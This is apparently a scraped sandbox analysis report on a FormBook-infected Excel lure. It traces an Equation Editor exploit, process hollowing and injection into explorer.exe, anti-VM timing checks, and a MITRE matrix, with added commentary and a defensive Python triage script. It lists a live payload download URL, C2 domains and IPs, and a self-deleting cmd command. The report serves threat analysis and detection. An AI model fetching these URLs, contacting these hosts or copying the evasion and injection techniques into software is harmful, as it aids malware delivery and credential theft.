Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\raserver.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00409A80 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0040ACC0 LdrLoadDll,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_009226F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F826F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\raserver.exe | Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe | Memory allocated: page read and write | page guard
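The two evasion mechanisms the report flags in this section (anti-VM and anti-sandbox strings in vbc.exe memory, and the paired RDTSC reads in RegSvcs.exe and raserver.exe) can both be found statically in a memory dump. The Python below is an added example written for this page; it is not code from the report or from Joe Sandbox. The dump it scans is constructed inline, the indicator strings are the ones the report quotes, and the opcode bytes are the standard x86 encodings of the listed instructions.

```python
"""Static triage of a memory dump for the two evasion patterns listed above.
Added example for this page, not code from the report or from Joe Sandbox.
The dump scanned at the bottom is constructed inline for the example."""

# Strings the report quotes from vbc.exe memory, keyed in upper case.
ANTIVM_INDICATORS = {
    "SBIEDLL.DLL": "Sandboxie hook DLL name",
    "WINE_GET_UNIX_FILE_NAME": "Wine-only kernel32 export",
    "VMWARE TOOLS": "VMware Tools install path",
    "VMWARE SVGA II": "VMware display adapter name",
    "SOFTWARE\\VMWARE, INC.\\VMWARE TOOLS": "VMware Tools registry key",
}

RDTSC = b"\x0f\x31"  # x86 opcode for rdtsc (standard encoding)


def antivm_indicators(buf: bytes) -> dict:
    """Case-insensitive search for each indicator; returns {indicator: why}.
    Case-insensitive because the report shows both 'VMWARE' and 'VMware'."""
    hay = buf.upper()
    return {k: v for k, v in ANTIVM_INDICATORS.items() if k.encode() in hay}


def _offsets(buf: bytes, needle: bytes) -> list:
    """All non-overlapping offsets of needle in buf."""
    out, i = [], buf.find(needle)
    while i != -1:
        out.append(i)
        i = buf.find(needle, i + len(needle))
    return out


def find_rdtsc_pairs(buf: bytes, window: int = 16) -> list:
    """Consecutive rdtsc reads at most `window` bytes apart, returned as
    (first_offset, second_offset, delta). Two reads that close together with
    trivial code between them exist only to time the instruction itself: a
    hypervisor that traps RDTSC, or a sandbox that single-steps, inflates the
    difference by orders of magnitude, which is what the sample tests."""
    offs = _offsets(buf, RDTSC)
    return [(a, b, b - a) for a, b in zip(offs, offs[1:]) if b - a <= window]


# The exact sequence the report's interceptor logged:
#   0F 31   rdtsc          (offset 0)
#   31 C9   xor ecx, ecx   (offset 2)
#   01 C1   add ecx, eax   (offset 4)
#   0F 31   rdtsc          (offset 6)
TIMING_CHECK = b"\x0f\x31\x31\xc9\x01\xc1\x0f\x31"

# Constructed dump (not real sample memory): zero padding, a module-name
# table, the timing check, and a registry value copied from the report.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"kernel32.dll\x00SbieDll.dll\x00"
    + b"\x90" * 32
    + TIMING_CHECK
    + b"\x00" * 16
    + b"InstallPath\x00C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\\x00"
)


def triage(buf: bytes) -> dict:
    """Combine both checks. One VM string alone can be incidental (the report
    shows the same VMware device names in the uninfected explorer.exe); a
    string hit together with a timing check is deliberate sandbox awareness."""
    indicators = antivm_indicators(buf)
    pairs = find_rdtsc_pairs(buf)
    return {"indicators": indicators, "rdtsc_pairs": pairs,
            "sandbox_aware": bool(indicators) and bool(pairs)}


if __name__ == "__main__":
    r = triage(SAMPLE_DUMP)
    for k, why in r["indicators"].items():
        print(f"anti-VM string {k!r}: {why}")
    for a, b, d in r["rdtsc_pairs"]:
        print(f"rdtsc pair at 0x{a:x} / 0x{b:x} (delta {d} bytes)")
    print("sandbox-aware:", r["sandbox_aware"])
```

A delta of 6 bytes between the two reads is exactly what the interceptor lines above show (0x4098E4 to 0x4098EA). The Thread sleep time entries serve the same purpose by a different route: 922337203685477 is 2^63 divided by 10^4, i.e. the largest signed 64-bit relative delay expressed in seconds, so the thread is parked for an effectively infinite time and a sandbox that shortens sleeps has to either skip it or lose the rest of the execution.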

            HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 216.130.188.93 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write (2 identical entries)
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\raserver.exe | Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 9A0000
Writes to foreign memory regions
Source: C:\Users\Public\vbc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\Public\vbc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\Public\vbc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: explorer.exe, 00000006.00000000.2192054318.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2378520807.00000000009C0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2192054318.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2378520807.00000000009C0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2191659808.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2192054318.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2378520807.00000000009C0000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

Yara detected FormBook (the same nine Yara matches as listed under Stealing of Sensitive Information)

            Mitre Att&ck Matrix

The report's matrix has one column per tactic; it is flattened here one tactic per line. Digits in parentheses are the report's superscript signature counts; techniques without a count are matrix cells the report shows but did not match.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Shared Modules (1); Exploitation for Client Execution (13); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: Process Injection (712); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Rootkit (1); Masquerading (111); Virtualization/Sandbox Evasion (3); Disable or Modify Tools (11); Process Injection (712); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (41); Software Packing (2); File Deletion (1)
Credential Access: Credential API Hooking (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Security Software Discovery (321); Virtualization/Sandbox Evasion (3); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (113); Network Sniffing; Network Service Scanning; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Credential API Hooking (1); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (12); Non-Application Layer Protocol (2); Application Layer Protocol (22); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

            Behavior Graph

Behavior Graph ID: 323046 | Sample: Booking Confirmation.xlsx | Start date: 26/11/2020 | Architecture: WINDOWS | Score: 100

The graph, flattened to a process tree (graph node numbers in brackets):

Start [2]
  DNS: www.akmh.pro
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 15 other signatures
  +-- EXCEL.EXE [16] started
  |     Dropped: C:\Users\user\...\~$Booking Confirmation.xlsx (data)
  +-- EQNEDT32.EXE [11] started
        Network: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu 103.125.191.5, port 49165 -> 80, VNPT-AS-VN VIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN, Viet Nam
        Dropped: C:\Users\user\AppData\...\svchost[1].exe (PE32); C:\Users\Public\vbc.exe (PE32)
        Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
        +-- vbc.exe [18] started
              Signatures: Multi AV Scanner detection for dropped file; Writes to foreign memory regions; Injects a PE file into a foreign processes
              +-- RegSvcs.exe [21] started
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
                    +-- explorer.exe [24] injected
                          Network: affinitymotorsales.com 216.130.188.93, port 49166 -> 80, WEBAIR-INTERNETUS, United States; setyourhead.com 34.102.136.180, port 49167 -> 80, GOOGLEUS, United States; 2 other IPs or domains
                          Signature: System process connects to network (likely due to code injection or exploit)
                          +-- raserver.exe [28] started
                                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                                +-- cmd.exe [31] started


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

Source | Detection | Scanner | Label
Booking Confirmation.xlsx | 31% | Virustotal | -
Booking Confirmation.xlsx | 25% | ReversingLabs | Document-Word.Trojan.Phishing

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe | 25% | ReversingLabs | Win32.Trojan.Wacatac
C:\Users\Public\vbc.exe | 25% | ReversingLabs | Win32.Trojan.Wacatac

Unpacked PE Files

Source | Detection | Scanner | Label
5.2.RegSvcs.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

Source | Detection | Scanner
setyourhead.com | 1% | Virustotal
workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu | 5% | Virustotal

            URLs

Source | Detection | Scanner | Label
http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe
http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe
http://www.dailymail.co.uk/ | 0% | URL Reputation | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe
http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exe | 100% | Avira URL Cloud | malware
http://%s.com | 0% | URL Reputation | safe
http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe
http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe
http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe
http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe
http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe
http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe
http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe
http://buscar.ozu.es/ | 0% | Avira URL Cloud | safe
http://www.affinitymotorsales.com/kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg== | 0% | Avira URL Cloud | safe
http://busca.igbusca.com.br/ | 0% | URL Reputation | safe
http://search.auction.co.kr/ | 0% | URL Reputation | safe
http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe
http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe
http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe
http://google.pchome.com.tw/ | 0% | URL Reputation | safe
http://www.ozu.es/favicon.ico | 0% | Avira URL Cloud | safe
http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe
http://www.gmarket.co.kr/ | 0% | URL Reputation | safe
http://searchresults.news.com.au/ | 0% | URL Reputation | safe
http://www.asharqalawsat.com/ | 0% | URL Reputation | safe
http://search.yahoo.co.jp | 0% | URL Reputation | safe
http://buscador.terra.es/ | 0% | URL Reputation | safe
http://search.orange.co.uk/favicon.ico | 0% | URL Reputation | safe
http://www.iask.com/ | 0% | URL Reputation | safe
http://cgi.search.biglobe.ne.jp/ | 0% | Avira URL Cloud | safe
http://search.ipop.co.kr/favicon.ico | 0% | URL Reputation | safe
http://p.zhongsou.com/favicon.ico | 0% | Avira URL Cloud | safe
http://service2.bfast.com/ | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
setyourhead.com | 34.102.136.180 | true | true | - | unknown
workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu | 103.125.191.5 | true | true | - | unknown
affinitymotorsales.com | 216.130.188.93 | true | true | - | unknown
www.akmh.pro | unknown | unknown | true | - | unknown
www.setyourhead.com | unknown | unknown | true | - | unknown
www.affinitymotorsales.com | unknown | unknown | true | - | unknown

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exe | true | Avira URL Cloud: malware | unknown
http://www.affinitymotorsales.com/kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg== | true | Avira URL Cloud: safe | unknown

The second URL is marked malicious on behavioural grounds (it is a request the injected explorer.exe made to affinitymotorsales.com, which the report lists as a contacted C2 host) even though the URL Cloud lookup returns safe: a reputation service has no verdict for a fresh host and query string, so "safe" here means "unknown to the scanner", not benign.

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://search.chol.com/favicon.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.mercadolivre.com.br/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.merlin.com.pl/favicon.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.ebay.de/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.mtv.com/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.rambler.ru/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.nifty.com/favicon.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.dailymail.co.uk/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www3.fnac.com/favicon.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://buscar.ya.com/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.yahoo.com/favicon.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sogou.com/favicon.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://asp.usatoday.com/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://fr.search.yahoo.com/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://rover.ebay.com | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://in.search.yahoo.com/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://img.shopzilla.com/shopzilla/shopzilla.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.ebay.in/ | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://image.excite.co.jp/jp/favicon/lep.ico | explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://%s.com | explorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmp | false

Every URL in this table was read from the explorer.exe process's own memory and none is marked malicious; they are not indicators for this sample and should not be copied into blocklists from the report.
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  low
                                                  http://msk.afisha.ru/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2189207331.0000000002371000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://search.rediff.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://search.naver.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://www.google.ru/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://search.daum.net/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://buscar.ozu.es/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://search.about.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://www.ask.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://www.cjmall.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://search.centrum.cz/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://suche.t-online.de/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.google.it/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://search.auction.co.kr/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.ceneo.pl/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.amazon.de/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2205387909.000000000861C000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://sads.myspace.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://search.sify.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://search.ebay.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
